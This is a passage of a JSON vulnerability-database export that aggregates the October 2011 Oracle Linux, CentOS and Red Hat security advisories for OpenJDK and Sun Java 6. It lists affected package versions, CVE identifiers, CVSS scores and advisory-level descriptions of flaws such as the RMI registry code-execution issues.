"java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "i386", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.0.1.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-demo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "i386", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.0.1.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.0.1.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk-demo", "operator": "lt"}], "description": "[1:1.6.0.0-1.40.1.9.10]\n- Resolves: rhbz#744788\n- Bumped to IcedTea6 1.9.8\n-removed font copying\n Security fixes\n - S7000600, CVE-2011-3547: InputStream skip() information leak\n - S7019773, CVE-2011-3548: mutable static AWTKeyStroke.ctor\n - S7023640, CVE-2011-3551: Java2D TransformHelper integer overflow\n - S7032417, CVE-2011-3552: excessive default UDP socket limit under SecurityManager\n - S7046823, CVE-2011-3544: missing SecurityManager checks in scripting engine\n - S7055902, CVE-2011-3521: IIOP deserialization code execution\n - S7057857, CVE-2011-3554: insufficient pack200 JAR files uncompress error checks\n - S7064341, CVE-2011-3389: JSSE\n - S7070134, CVE-2011-3558: Hotspot unspecified issue\n - S7077466, CVE-2011-3556: RMI DGC server remote code execution\n - S7083012, CVE-2011-3557: RMI registry privileged code execution\n - S7096936, CVE-2011-3560: missing checkSetFactory calls in HttpsURLConnection\n NetX\n - PR794: javaws does not work if a Web Start app jar has a Class-Path element in the manifest", "edition": 3, "reporter": "Oracle", "published": "2011-10-18T00:00:00", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2011-10-18T00:00:00", "id": "ELSA-2011-1380", "href": "http://linux.oracle.com/errata/ELSA-2011-1380.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:24:26", "references": ["https://rhn.redhat.com/errata/RHSA-2011-1380.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk-javadoc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk-demo", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk-javadoc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk-demo", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk-src", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7.src.rpm", "packageName": "java-1.6.0-openjdk", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7.src.rpm", "packageName": "java-1.6.0-openjdk", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk-src", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2011:1380\n\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry\nimplementation. A remote RMI client could use this flaw to execute\narbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI\nclient could use this flaw to execute code on the RMI server with\nunrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization\ncode. An untrusted Java application or applet running in a sandbox could\nuse this flaw to bypass sandbox restrictions by deserializing\nspecially-crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict the\nprivileges of sandboxed applications. An untrusted Java application or\napplet running in a sandbox could use this flaw to bypass sandbox\nrestrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java\napplication or applet running in a sandbox could use this flaw to bypass\nsandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the Java2D code used to perform transformations of graphic shapes\nand images. An untrusted Java application or applet running in a sandbox\ncould use this flaw to bypass sandbox restrictions. (CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR files\nin pack200 format. A specially-crafted JAR file could use this flaw to\ncrash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code\nwith JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager checks\nin the setSSLSocketFactory method. An untrusted Java application or applet\nrunning in a sandbox could use this flaw to bypass connection restrictions\ndefined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\nciphers in cipher-block chaining (CBC) mode. An attacker able to perform a\nchosen plain text attack against a connection mixing trusted and untrusted\ndata could use this flaw to recover portions of the trusted data sent over\nthe connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the first\napplication data record byte to a separate SSL/TLS protocol record. This\nmitigation may cause compatibility issues with some SSL/TLS implementations\nand can be disabled using the jsse.enableCBCProtection boolean property.\nThis can be done on the command line by appending the flag\n\"-Djsse.enableCBCProtection=false\" to the java command.\n\nAn information leak flaw was found in the InputStream.skip implementation.\nAn untrusted Java application or applet could possibly use this flaw to\nobtain bytes skipped by other threads. (CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted Java\napplication or applet could use this flaw to disclose portions of the VM\nmemory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK was\nconfigured to include the stack trace in error messages sent to clients. A\nremote client could possibly use this flaw to obtain sensitive information.\n(CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager\nrestrictions were allowed to use too many UDP sockets by default. If\nmultiple instances of a malicious application were started at the same\ntime, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-October/018121.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-October/018122.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1380.html", "edition": 1, "reporter": "CentOS Project", "published": "2011-10-19T17:07:19", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "java security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2011-10-19T17:07:19", "href": "http://lists.centos.org/pipermail/centos-announce/2011-October/018121.html", "id": "CESA-2011:1380", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-06-12T21:09:56", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "i386", "packageName": "java-1.6.0-openjdk", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "i386", "packageName": "java-1.6.0-openjdk-demo", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "i386", "packageName": "java-1.6.0-openjdk-devel", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "i386", "packageName": "java-1.6.0-openjdk-javadoc", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "i386", "packageName": "java-1.6.0-openjdk-src", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.el5_7.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "src", "packageName": "java-1.6.0-openjdk", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "x86_64", "packageName": "java-1.6.0-openjdk", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-demo", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-devel", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-javadoc", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.el5_7", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-src", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.el5_7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageName": "java-1.6.0-openjdk-debuginfo", "packageFilename": "java-1.6.0-openjdk-debuginfo-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "src", "packageName": "java-1.6.0-openjdk", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-debuginfo", "packageFilename": "java-1.6.0-openjdk-debuginfo-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageName": "java-1.6.0-openjdk-demo", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageName": "java-1.6.0-openjdk-devel", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageName": "java-1.6.0-openjdk-javadoc", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageName": "java-1.6.0-openjdk-src", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-demo", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-devel", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-javadoc", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-src", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageName": "java-1.6.0-openjdk", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageName": "java-1.6.0-openjdk", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "operator": "lt"}], "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry\nimplementation. A remote RMI client could use this flaw to execute\narbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI\nclient could use this flaw to execute code on the RMI server with\nunrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization\ncode. An untrusted Java application or applet running in a sandbox could\nuse this flaw to bypass sandbox restrictions by deserializing\nspecially-crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict the\nprivileges of sandboxed applications. An untrusted Java application or\napplet running in a sandbox could use this flaw to bypass sandbox\nrestrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java\napplication or applet running in a sandbox could use this flaw to bypass\nsandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the Java2D code used to perform transformations of graphic shapes\nand images. An untrusted Java application or applet running in a sandbox\ncould use this flaw to bypass sandbox restrictions. (CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR files\nin pack200 format. A specially-crafted JAR file could use this flaw to\ncrash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code\nwith JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager checks\nin the setSSLSocketFactory method. An untrusted Java application or applet\nrunning in a sandbox could use this flaw to bypass connection restrictions\ndefined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\nciphers in cipher-block chaining (CBC) mode. An attacker able to perform a\nchosen plain text attack against a connection mixing trusted and untrusted\ndata could use this flaw to recover portions of the trusted data sent over\nthe connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the first\napplication data record byte to a separate SSL/TLS protocol record. This\nmitigation may cause compatibility issues with some SSL/TLS implementations\nand can be disabled using the jsse.enableCBCProtection boolean property.\nThis can be done on the command line by appending the flag\n\"-Djsse.enableCBCProtection=false\" to the java command.\n\nAn information leak flaw was found in the InputStream.skip implementation.\nAn untrusted Java application or applet could possibly use this flaw to\nobtain bytes skipped by other threads. (CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted Java\napplication or applet could use this flaw to disclose portions of the VM\nmemory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK was\nconfigured to include the stack trace in error messages sent to clients. A\nremote client could possibly use this flaw to obtain sensitive information.\n(CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager\nrestrictions were allowed to use too many UDP sockets by default. If\nmultiple instances of a malicious application were started at the same\ntime, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "reporter": "RedHat", "published": "2011-10-18T04:00:00", "type": "redhat", "title": "(RHSA-2011:1380) Critical: java-1.6.0-openjdk security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3558", "CVE-2011-3560"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:08", "id": "RHSA-2011:1380", "href": "https://access.redhat.com/errata/RHSA-2011:1380", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-07T05:58:40", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "i686", "packageName": "java-1.6.0-sun", "packageFilename": "java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "i686", "packageName": "java-1.6.0-sun-demo", "packageFilename": "java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "i686", "packageName": "java-1.6.0-sun-devel", "packageFilename": "java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "i686", "packageName": "java-1.6.0-sun-jdbc", "packageFilename": "java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "i686", "packageName": "java-1.6.0-sun-plugin", "packageFilename": "java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "i686", "packageName": "java-1.6.0-sun-src", "packageFilename": "java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun", "packageFilename": "java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-demo", "packageFilename": "java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-devel", "packageFilename": "java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-jdbc", "packageFilename": "java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-plugin", "packageFilename": "java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.29-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-src", "packageFilename": "java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm", "operator": "lt"}], "description": "The Sun 1.6.0 Java release includes the Sun Java 6 Runtime Environment and\nthe Sun Java 6 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Sun Java 6 Runtime\nEnvironment and the Sun Java 6 Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch page, listed in the References section. (CVE-2011-3389,\nCVE-2011-3516, CVE-2011-3521, CVE-2011-3544, CVE-2011-3545, CVE-2011-3546,\nCVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3550, CVE-2011-3551,\nCVE-2011-3552, CVE-2011-3553, CVE-2011-3554, CVE-2011-3555, CVE-2011-3556,\nCVE-2011-3557, CVE-2011-3558, CVE-2011-3560, CVE-2011-3561)\n\nAll users of java-1.6.0-sun are advised to upgrade to these updated\npackages, which provide JDK and JRE 6 Update 29 and resolve these issues.\nAll running instances of Sun Java must be restarted for the update to take\neffect.\n", "reporter": "RedHat", "published": "2011-10-19T04:00:00", "type": "redhat", "title": "(RHSA-2011:1384) Critical: java-1.6.0-sun security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-3516", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3545", "CVE-2011-3546", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3549", "CVE-2011-3550", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3555", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3558", "CVE-2011-3560", "CVE-2011-3561"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T09:04:23", "id": "RHSA-2011:1384", "href": "https://access.redhat.com/errata/RHSA-2011:1384", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:06", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "i386", "packageFilename": "java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.i386.rpm", "packageName": "java-1.4.2-ibm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "i386", "packageFilename": "java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el5.i386.rpm", "packageName": "java-1.4.2-ibm-jdbc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "i386", "packageFilename": "java-1.4.2-ibm-plugin-1.4.2.13.11-1jpp.1.el5.i386.rpm", "packageName": "java-1.4.2-ibm-plugin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "i386", "packageFilename": "java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.i386.rpm", "packageName": "java-1.4.2-ibm-src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "i386", "packageFilename": "java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.i386.rpm", "packageName": "java-1.4.2-ibm-demo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "i386", "packageFilename": "java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.i386.rpm", "packageName": "java-1.4.2-ibm-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "i386", "packageFilename": "java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.i386.rpm", "packageName": "java-1.4.2-ibm-javacomm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "x86_64", "packageFilename": 